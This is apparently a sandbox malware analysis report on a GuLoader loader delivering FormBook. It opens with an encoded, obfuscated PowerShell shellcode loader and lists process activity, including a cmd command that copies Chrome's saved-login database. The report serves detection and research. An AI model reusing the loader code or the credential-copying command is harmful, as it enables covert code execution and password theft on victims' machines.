QBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARQBuAHUAbQBGAG8AbgB0AHMAQQAoAHMAdAByAGkAbgBnACAAUgB1AGMAdABpAG8AdQAsAHUAaQBuAHQAIABNAHUAcwBrAGkAbAB5ADcALABpAG4AdAAgAEQAZQBiAGkANwAsAGkAbgB0ACAAYwBoAG8AbgBkAHIAbwBnAGEAMAAsAGkAbgB0ACAARgBhAHIAbQBhAGsALABpAG4AdAAgAFEAdQBpAG4AcQB1AGUAdgBlACwAaQBuAHQAIABTAEwARwBUACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBFAFIATgBFAEwAMwAyACIALAAgAEUAbgB0AHIAeQBQAG8AaQBuAHQAPQAiAEMAcgBlAGEAdABlAEYAaQBsAGUAQQAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQBhAGMAKABbAE0AYQByAHMAaABhAGwAQQBzACgAVQBuAG0AYQBuAGEAZwBlAGQAVAB5AHAAZQAuAEwAUABTAHQAcgApAF0AcwB0AHIAaQBuAGcAIABSAHUAYwB0AGkAbwB1ACwAdQBpAG4AdAAgAE0AdQBzAGsAaQBsAHkANwAsAGkAbgB0ACAARABlAGIAaQA3ACwAaQBuAHQAIABjAGgAbwBuAGQAcgBvAGcAYQAwACwAaQBuAHQAIABGAGEAcgBtAGEAawAsAGkAbgB0ACAAUQB1AGkAbgBxAHUAZQB2AGUALABpAG4AdAAgAFMATABHAFQAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBuAHQAZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABOAHQAQQBsAGwAbwBjAGEAdABlAFYAaQByAHQAdQBhAGwATQBlAG0AbwByAHkAKABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADYALAByAGUAZgAgAEkAbgB0ADMAMgAgAEMAbABhAHQAaAByAGEANAAsAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEALAByAGUAZgAgAEkAbgB0ADMAMgAgAGMAaABvAG4AZAByAG8AZwBhACwAaQBuAHQAIABPAHUAdABoAG8AdwBsAGkAbgBnADUALABpAG4AdAAgAGMAaABvAG4AZAByAG8AZwBhADcAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBLAEUAUgBOAEUATAAzADIAIgAsACAARQBuAHQAcgB5AFAAbwBpAG4AdAA9ACIAUgBlAGEAZABGAGkAbABlACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAQwBEAEEAQwAoAGkAbgB0ACAAVgBhAHIAZQBkAGUAawBsAGEAMAAsAHUAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQAxACwASQBuAHQAUAB0AHIAIABWAGEAcgBlAGQAZQBrAGwAYQAyACwAcgBlAGYAIABJAG4AdAAzADIAIABWAGEAcgBlAGQAZQBrAGwAYQAzACwAaQBuAHQAIABWAGEAcgBlAGQAZQBrAGwAYQA0ACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAVQBTAEUAUgAzADIAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKABJAG4AdABQAHQAcgAgAFYAYQByAGUAZABlAGsAbABhADUALABpAG4AdAAgAFYAYQByAGUAZABlAGsAbABhADYAKQA7AA0ACgANAAoAfQANAAoAIgBAAA0ACgAjAFIAZQBtAG8AcAA4ACAARABSAFQAUgBJAE4ARQBUAEkATgAgAFIAZQB0AHIAZQA0ACAAVABqAGUAcgByAGkAbAAgAFUAcgBzAGsAbwB2AHMAbQByACAARQB4AGkAbABpAGMAbQB5AHMAdAA2ACAASQBsAGQAcwBwAHkAZQBuAGQAZQAgAEIAYQBrAHQAIABNAEUATABJAE8AUgBBACAAcwByAHYAZQByAGkAIABBAHUAZwB1AHIAZQByACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAMgA9ACIAJABlAG4AdgA6AHQAZQBtAHAAIgAgACsAIAAiAFwASABlAHQAZQByAG8AMwAuAGQAYQB0ACIADQAKACMAcABvAHMAdABwACAATQBvAG4AbwB0AG8AbgBlAHIAZQAgAFMASQBHAE4ASQBGACAAVABpAGQAcwBrAHIAYQAgAEwARQBGAFQASQAgAFIARQBGAE8AUgBNAFAATABBAE4AIABLAGwAYQBnADUAIABSAG8AdABhAG0AYQBuACAASQBuAGQAaQB2ACAAUgBvAHQAdABlAGYAbgBnAGUAIABUAGUAcgByAGkAdABvAHIAaQAyACAAWABZAEwATwBDAE8AUABBAFAAIABnAG8AZwB5AGQAZQAgAE0AaQBjAHIAbwBiAGUAcAAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADMAPQAwADsADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEAOQA9ADEAMAA0ADgANQA3ADYAOwANAAoAJABjAGgAbwBuAGQAcgBvAGcAYQA4AD0AWwBjAGgAbwBuAGQAcgBvAGcAYQAxAF0AOgA6AE4AdABBAGwAbABvAGMAYQB0AGUAVgBpAHIAdAB1AGEAbABNAGUAbQBvAHIAeQAoAC0AMQAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADMALAAwACwAWwByAGUAZgBdACQAYwBoAG8AbgBkAHIAbwBnAGEAOQAsADEAMgAyADgAOAAsADYANAApAA0ACgAjAEsAQQBSAFQATwAgAEMAaABpAGwAIABlAHMAcAByAGkAdABpAG4AcwB0ACAAUwBIAFIASQBMAEwASQBOACAAQgBPAFAATABTACAAQwByAHkAcAB0AG8AIABVAGsAcgBsAGkAZwBzAHQAZQAxACAATQBlAGwAbwB0AHIAYQAgAFMAVQBQAFAAUgBFAFMASQBWAEUAIABDAGgAZQBmACAAUgBvAHMAZQB2AGkAbgBlADUAIABCAGkAbABiAHIAbwBlAG4AcwBwACAAQQByAGIAZQBqADIAIABJAG4AdABlAHIAYwBhAG0AcAAgAEcARQBWAEEATABUAEkAIABSAFUAQwBIAEUAUgBTAFQARQBOACAARABJAFMAUABSACAADQAKACQAYwBoAG8AbgBkAHIAbwBnAGEANAA9AFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBWAGkAYQBjACgAJABjAGgAbwBuAGQAcgBvAGcAYQAyACwAMgAxADQANwA0ADgAMwA2ADQAOAAsADEALAAwACwAMwAsADEAMgA4ACwAMAApAA0ACgAjAGQAaQBmAGYAZQByAGUAbgAgAGgAYQB2AGUAIABNAG8AYgBpAGwAZQB0AHMAZwByADMAIABhAHIAawBmAGQAZQByACAAaQBuAGQAawAgAEsATABPAEQAUgBJAEEATgBFAFIAIABUAEEAUwBLAEUASwBSAEEAQgBCACAAUwBKAFUAUwBTACAAdwBoAGUAYQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA==
Imagebase:	0x5d0000
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000D.00000002.1828222321.0000000009C70000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5804, Parent PID: 4736

General

Target ID:	14
Start time:	14:22:01
Start date:	10/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff698ef0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: csc.exePID: 10008, Parent PID: 4736

General

Target ID:	23
Start time:	14:22:23
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gkb1wfd4\gkb1wfd4.cmdline
Imagebase:	0xc20000
File size:	2141552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: cvtres.exePID: 10032, Parent PID: 10008

General

Target ID:	24
Start time:	14:22:23
Start date:	10/05/2022
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2E9C.tmp" "c:\Users\user\AppData\Local\Temp\gkb1wfd4\CSC1FB6CDA7423C41F280B0C76B8C389BB7.TMP"
Imagebase:	0xb70000
File size:	46832 bytes
MD5 hash:	70D838A7DC5B359C3F938A71FAD77DB0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 10144, Parent PID: 4736

General

Target ID:	26
Start time:	14:22:37
Start date:	10/05/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 416, Parent PID: 4736

General

Target ID:	27
Start time:	14:22:37
Start date:	10/05/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	C:\Program Files (x86)\internet explorer\ieinstal.exe
Imagebase:	0xf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.1967295052.0000000002D60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001B.00000002.1993285562.000000001EC30000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000001B.00000000.1581138721.0000000003000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: explorer.exePID: 4828, Parent PID: 416

General

Target ID:	28
Start time:	14:22:51
Start date:	10/05/2022
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff7a3360000
File size:	4849904 bytes
MD5 hash:	5EA66FF5AE5612F921BC9DA23BAC95F7
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.1882463861.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000001C.00000000.1804806657.000000000AD63000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chkdsk.exePID: 4556, Parent PID: 4828

General

Target ID:	32
Start time:	14:23:13
Start date:	10/05/2022
Path:	C:\Windows\SysWOW64\chkdsk.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\chkdsk.exe
Imagebase:	0xba0000
File size:	23040 bytes
MD5 hash:	B4016BEE9D8F3AD3D02DD21C3CAFB922
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5730000844.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5716637360.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.5728868975.0000000000B70000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 7364, Parent PID: 4556

General

Target ID:	33
Start time:	14:23:36
Start date:	10/05/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Imagebase:	0x600000
File size:	236544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 596, Parent PID: 7364

General

Target ID:	34
Start time:	14:23:36
Start date:	10/05/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff698ef0000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 1404, Parent PID: 4828

General

Target ID:	35
Start time:	14:23:36
Start date:	10/05/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Imagebase:	0xf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: ieinstal.exePID: 2160, Parent PID: 4828

General

Target ID:	36
Start time:	14:23:45
Start date:	10/05/2022
Path:	C:\Program Files (x86)\Internet Explorer\ieinstal.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\internet explorer\ieinstal.exe"
Imagebase:	0xf0000
File size:	480256 bytes
MD5 hash:	7871873BABCEA94FBA13900B561C7C55
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: firefox.exePID: 7624, Parent PID: 4556

General

Target ID:	37
Start time:	14:23:57
Start date:	10/05/2022
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Mozilla Firefox\Firefox.exe
Imagebase:	0x7ff62d2d0000
File size:	597432 bytes
MD5 hash:	FA9F4FC5D7ECAB5A20BF7A9D1251C851
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: powershell.exePID: 4736, Parent PID: 9728COMMON

Execution Graph

Execution Coverage:	12.1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.4%
Total number of Nodes:	109
Total number of Limit Nodes:	5

Executed Functions

Function 08356A50 Relevance: 5.5, Strings: 4, Instructions: 517
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(6l, xrefs: 08356FD7
d, xrefs: 08356CA5
(6l, xrefs: 08357003
(6l, xrefs: 08356A64

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID:
String ID: (6l$(6l$(6l$d
API String ID: 0-4211025718
Opcode ID: 9b46df26d7b2a98774dbde3245be601c7caaef58c605d5083fee72effc1002bd
Instruction ID: be33e8aa4b11b5ec6869ca242dd69d25ea9dcda15b2668a878dd06f12d840aa9
Opcode Fuzzy Hash: 9b46df26d7b2a98774dbde3245be601c7caaef58c605d5083fee72effc1002bd
Instruction Fuzzy Hash: 5E12BA34A04605CFCB14CF68C48596AB7F2EFC8315B55CA69D91A9B7A1EB30FC42CB90

Uniqueness

Uniqueness Score: -1.00%

Function 04F18FA8 Relevance: 4.2, Strings: 2, Instructions: 1694
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f7l, xrefs: 04F1AF5A
f7l, xrefs: 04F1AEAA

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID:
String ID: f7l$ f7l
API String ID: 0-1822717923
Opcode ID: 1fd68c09041d85e2794ca8527fb017a2a899000903f86ce9acc8a65f1791c988
Instruction ID: 9596f3d376ed945ab8cbb247b1a53af17899a271ca78e91be113a4b06742fac8
Opcode Fuzzy Hash: 1fd68c09041d85e2794ca8527fb017a2a899000903f86ce9acc8a65f1791c988
Instruction Fuzzy Hash: CE037734A442189FDB69DB60DD54BEAB773FB98304F1180A8DA0A6B784CF396D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04F18FF2 Relevance: 4.2, Strings: 2, Instructions: 1692
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f7l, xrefs: 04F1AF5A
f7l, xrefs: 04F1AEAA

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID:
String ID: f7l$ f7l
API String ID: 0-1822717923
Opcode ID: 3e3506c17f4fb28ee341493a92c8cdbe5f82e32e5da84230020b403beddbe82e
Instruction ID: 1fa6bcfad7c68acc0272269cdf1569edcbe83abd2d86bc30042e85d7a8cab58b
Opcode Fuzzy Hash: 3e3506c17f4fb28ee341493a92c8cdbe5f82e32e5da84230020b403beddbe82e
Instruction Fuzzy Hash: 4B037834A442189FDB69DB60DD54BEAB773FB98304F1180A8DA0A6B784CF396D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 04F19000 Relevance: 4.2, Strings: 2, Instructions: 1689
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f7l, xrefs: 04F1AF5A
f7l, xrefs: 04F1AEAA

Memory Dump Source

Source File: 0000000D.00000002.1782016079.0000000004F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04F10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_4f10000_powershell.jbxd

Similarity

API ID:
String ID: f7l$ f7l
API String ID: 0-1822717923
Opcode ID: f6f0e5b97ba649af03d49cdcf6b068f75da28b5d4ac7a389c60de20b91ddac1d
Instruction ID: ed3fb533b6c265990eecb9f8a50bf9e87aaf8a289ee32a7efa57ca35725be890
Opcode Fuzzy Hash: f6f0e5b97ba649af03d49cdcf6b068f75da28b5d4ac7a389c60de20b91ddac1d
Instruction Fuzzy Hash: E6037734A442189FDB69DB60DD54BEAB773FB98304F1180A8DA0A6B784CF396D81CF51

Uniqueness

Uniqueness Score: -1.00%

Function 08350420 Relevance: 1.6, APIs: 1, Instructions: 128pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08352288

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID: CreateNamedPipe
String ID:
API String ID: 2489174969-0
Opcode ID: e3d4ce18ee6dbf6c2df13c8d90f7f5e645b45c91b7fae3baae0182eac33d3a36
Instruction ID: 1760cf4d305d9e06f0e26b0bf4f3fe793a807fcf1921582202145f97b53a63e8
Opcode Fuzzy Hash: e3d4ce18ee6dbf6c2df13c8d90f7f5e645b45c91b7fae3baae0182eac33d3a36
Instruction Fuzzy Hash: 71512671D01348DFDB54CFAAC984B9EBBF2AF88314F25802AE918AB251D7749880CF51

Uniqueness

Uniqueness Score: -1.00%

Function 0836EC40 Relevance: .6, Instructions: 634COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1812590622.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f0d77c00b891c9eb498dabe3f7528b30403f24ec51f6b9e2b41017e9436d62b
Instruction ID: d78c71ed727c618b23b70b374c0bb195fca33507cf7df3e1f2c463825c04d84e
Opcode Fuzzy Hash: 6f0d77c00b891c9eb498dabe3f7528b30403f24ec51f6b9e2b41017e9436d62b
Instruction Fuzzy Hash: E342B234A042159FEB249B64CC50BADB3B2EF88304F11C5AAD9097B395DF71AD81CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0835E830 Relevance: .4, Instructions: 379COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1812464201.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8350000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca8368d45f372e6a0edc2f2dddc19934b18eb5cc80c5459685302a10a86e85f
Instruction ID: 60cf19eb7c087a7c1184ed4ad5dafe3e9b6a4d020f2e8905ac1fa94e42193a8c
Opcode Fuzzy Hash: dca8368d45f372e6a0edc2f2dddc19934b18eb5cc80c5459685302a10a86e85f
Instruction Fuzzy Hash: 27D1E134B042059FDB14DBA4D958AAEBBF6EFC9305F158029E905EB391CF34AD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 08367358 Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.1812590622.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ac9c42552bcc768959b3dfdda3a285800d6f9bdaf01e0b8d2341562dba07a43
Instruction ID: d692678d6b47067d45f8186e0b3d79c6e53e417ae4c12f5e7e72826ea233ffab
Opcode Fuzzy Hash: 2ac9c42552bcc768959b3dfdda3a285800d6f9bdaf01e0b8d2341562dba07a43
Instruction Fuzzy Hash: 8DA1A070600205CFEB29DF38C458BAA7BE2AFC8319F94C66DD5019B7A5CB78D851CB81

Uniqueness

Uniqueness Score: -1.00%

Function 08366B00 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4L2l, xrefs: 08366B35

Memory Dump Source

Source File: 0000000D.00000002.1812590622.0000000008360000.00000040.00000800.00020000.00000000.sdmp, Offset: 08360000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_8360000_powershell.jbxd

Similarity

API ID: CreateFile
String ID: 4L2l
API String ID: 823142352-2398731596
Opcode ID: 24ac8b752dc2c50400a5839eb079451313c689c2de54b311644eaafb7dcfca5c
Instruction ID: bf2aab9b292ee84aebc369f4fa5961eb67166be532f3de55c5a72eb67bc3c0d7
Opcode Fuzzy Hash: 24ac8b752dc2c50400a5839eb079451313c689c2de54b311644eaafb7dcfca5c
Instruction Fuzzy Hash: CB41D2719042199FDB10DFA9C845B9EFBB4EF48324F04C169E505AB381D7749940CFE1

Uniqueness

Uniqueness Score: -1.00%

